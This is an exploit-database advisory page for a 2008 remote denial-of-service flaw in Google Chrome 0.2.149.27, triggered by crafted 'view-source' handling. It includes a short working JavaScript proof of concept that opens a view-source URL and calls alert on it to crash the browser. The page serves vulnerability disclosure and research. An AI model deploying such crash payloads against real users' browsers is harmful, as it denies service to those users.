header-logo
Suggest Exploit
vendor:
Chrome
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Denial-of-Service
20
CWE
Product Name: Chrome
Affected Version From: 0.2.149.27
Affected Version To: 0.2.149.27
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Google Chrome Remote Denial-of-Service Vulnerability

Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers. Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Mitigation:

Users should avoid opening untrusted links or files.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/31035/info

Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers.

Attackers can exploit this issue to crash the affected application, denying service to legitimate users.

Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected. 

<script>
a = window.open("view-source:http://123")
a.alert(1)
</script>